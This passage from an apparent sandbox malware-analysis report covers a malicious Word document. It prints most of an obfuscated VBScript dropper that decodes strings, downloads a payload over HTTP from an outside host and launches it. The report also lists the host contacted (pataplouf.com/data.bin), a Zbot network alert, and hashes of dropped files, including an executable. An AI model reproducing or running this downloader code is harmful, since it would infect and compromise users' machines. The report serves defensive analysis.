NIHd6n(Ie(FFtQW(YZy.rEAD(9788-9787)),Ps(0)))" "lOOP" "NWwLO0Y=78" "MQb.CLOSe" "AhAjIC=25" "YZy.cLOsE" "Sc=82" "ENd FUNCTIoN" "SuB XBEwSO()" "Yv=53" "Moz=98934287" "LKhw=79" "fOR FbW=1 To Moz" "Ah9n4=Ah9n4+1" "NEXt" "UDCD=18" "If Ah9n4=Moz thEN" "Xfmx=28" "CdugF((18832/4708))" "WFpl=80" "Bts6(DUskHmc("042405486A764320104C3129003F045E7E3A033D5E5C312D0D7E13513E","YlPq8P"))" "MAqx=4" "eNd iF" "By=45" "ENd SuB" "FUNcTioN C3p()" "MKUg=40" "C3p=sECoND(tiME)" "IcqXbS=21" "End FUNctIOn" "FUNCtIOn DUskHmc(SN3,WnmJT9)" "BVFAQ=80" "diM Mi7,C0,SBK" "Ctva=56" "foR Mi7=1 To (LeN(SN3)/2)" "C0=(NIHd6n((6341-6303)) & NIHd6n((-3454+3526))&(MId(SN3,(Mi7+Mi7)-1,2)))" "SBK=(FFtQW(Mid(WnmJT9,((Mi7 moD Len(WnmJT9))+1),1)))" "DUskHmc=DUskHmc+NIHd6n(Ie(C0,SBK))" "nExT" "ItpbRaa=4" "eND FunCTiOn" "SUb CdugF(YZfaQ)" "MW8fQk=19" "DiM LKgz" "RQU91=43" "LKgz=tiMeR+YZfaQ" "Do wHilE TiMer<LKgz" "LOOp" "ALr6vt7=10" "EnD suB" "suB YjdX()" "D2=51" "dIm N0S,YR3Zi" "BXZQPVv=15" "Do whILE N0S<>2924-2923" "YR3Zi=YR3Zi+1" "lOOp" "McE72Y=1" "eNd SuB" "FunCTIon Bts6(QQCtSoh)" "NEAPx=19" "diM ISw4hb,Ur" "V9ev=73" "EgKO="Wj"" "MGN=2" "On ErRor resUme nExt" "RHSGp=70" "S0L="Ki"" "BHaPLD=77" "sET ISw4hb=CreaTeobjecT(DUskHmc("3E180A39003B1D653A230C2705",S0L))" "PcLJK=69" "OkiIp="Ks"" "FKSr3C" "RT5=6" "Set Dj=ISw4hb.EnViRoNMent(DUskHmc("35281C15021F36","LezSVG"))" "OK5SlJB=59" "U2E=Dj(DUskHmc("2B2A170C333D16","WjzGHri"))&NIHd6n((-383+475))& C3p & C3p" "XPzv=84" "V9fqN="IT"" "VNhUU=34" "sEt Ur=creATeobjECt(DUskHmc("1920373B3B3A3B2F20670C041801001D04",V9fqN))" "SU6=49" "Ur.oPen DUskHmc("7F0436","K8AbB"),QQCtSoh,2084-2084" "Fk=12" "Ur.sEnD()" "JcwrO2=72" "if Ur.StATus=(779-579) then" "JW4C9E=56" "FKSr3C" "XTMuLm=15" "CdugF((8748-8744))" "SJG9Gl=47" "JShIKc Ur.REsPONseBoDY" "ULYa=19" "Else" "ImVGu=56" "LE="XT1qx2y"" "UNe394=87" "SEt Ur= CReatEoBject(DUskHmc("1958120A5D0A3732455F207F3510006521",LE))" "WJPwKs=61" "Ur.opeN DUskHmc("750666","C2"),DUskHmc("27464632681C617D02056C670460771C0077631C2A2E46536C305A20","NO22BR3" ),118-118" "J6BhGq=71" "Ur.Send()" "Cr=26" "If Ur.sTAtUs=(-9447+9647)Then JShIKc Ur.reSPonsEBOdY" "OGHTLr=13" "WRGjPN=93" "end if" "VJtV=92" "End FUNctiOn") do @echo %~i)>"!IMPWcMk!" && start "" "!IMPWcMk!"
(PID: 3128)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pataplouf.com | 213.186.33.168 | - | France |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
213.186.33.168 |
80
TCP |
wscript.exe PID: 2720 |
France
ASN: 16276 (OVH SAS) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
213.186.33.168:80 (pataplouf.com) | GET | pataplouf.com/data.bin |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 213.186.33.168:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
Extracted Strings
Extracted Files
-
Informative 13
-
-
~WRS{C4CA1DDF-3C5B-44E9-878C-FFA674DC61EC}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~WRS{7DC8356D-B306-4181-BE3E-1866D9CE1957}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
eddb68e509259ca752949a523261e941d09db30f23d9a5b787e4920e364b57b2.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Tue Aug 9 01:55:30 2016, mtime=Tue Aug 9 01:55:30 2016, atime=Tue Aug 9 01:55:22 2016, length=229888, window=hide
- MD5
- 1129f95baa86777b04714a4f86397b4c
- SHA1
- cf35988e0045260a01e72ca9581fde0cc3188a5f
- SHA256
- 4d7eda3de68c760c56f2801555e3b7684417cd14b33211be197210935f89e6cc
-
index.dat
- Size
- 622B (622 bytes)
- Type
- data
- MD5
- fc787d7468e0d50e9a6f65385d65d925
- SHA1
- 070761bc6a6390504d7dbf4cc8a8363693e1dfbb
- SHA256
- acd71342c3f20db7ad616e974480900d669c774e9b0f20da26554c17be1a802a
-
data[1].bin
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
00.bym
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
12537.vbs
- Size
- 3.7KiB (3753 bytes)
- Type
- ASCII text, with CRLF line terminators
- MD5
- a7235a66b41751adc26089b762408e72
- SHA1
- 48fb2fb934b85328cd42751a18b257fe9f278126
- SHA256
- fbe0fbbed73463dc8d0b449647261c17620645f6c6d54623836e8202755fc5e8
-
000.Dur
- Size
- 58KiB (59492 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- MD5
- 06f04668851aba26f0f9e624d2ee7c44
- SHA1
- 327619d4dcf8c455aeb66dcbceec03e52d2b0ef8
- SHA256
- 0230014d82494b911722c4e068ef5d17f863d0b9ba27d29dc03d42cc46f44139
-
~WRS{BB503958-3802-44FF-AB19-EA86B3B10994}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- 304e99b0ec0c49b031719d4f9ec8e704
- SHA1
- 0bdf8aa2b661854881f0c277b92ed8799a7eb2cd
- SHA256
- 4e485006098a8868e47040e7f01dc2212c99a8f1bb23d72243c89c0b4effcbe6
-
~$db68e509259ca752949a523261e941d09db30f23d9a5b787e4920e364b57b2.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 42897123b393b25765e69d3f01335da4
- SHA1
- b1232fd247d38ca9ee96d8f0e5afaba92ad2eab1
- SHA256
- c843ded94caed143a6fae2ed23c1707f2aa5bf7f55152601bbe8629d024e5842
-
4095702.cvr
- Size
- 1.9KiB (1972 bytes)
- Type
- data
- MD5
- 462a4a83900a2e5f1925bb6f33f79ec6
- SHA1
- a66774628c4ae2d472f06ad431dd1a52dd23a2f0
- SHA256
- f347e174c47b83853c3db03a229c2aa51f6af4dd1725aa7ad39863251bbe34a4
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 42897123b393b25765e69d3f01335da4
- SHA1
- b1232fd247d38ca9ee96d8f0e5afaba92ad2eab1
- SHA256
- c843ded94caed143a6fae2ed23c1707f2aa5bf7f55152601bbe8629d024e5842
-
Notifications
-
Runtime
- A process crash was detected during the runtime analysis
- Dropped file "000.Dur" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/0230014d82494b911722c4e068ef5d17f863d0b9ba27d29dc03d42cc46f44139/analysis/1470675842/")
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "string-43" are available in the report
- Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/eddb68e509259ca752949a523261e941d09db30f23d9a5b787e4920e364b57b2/analysis/1470675829/")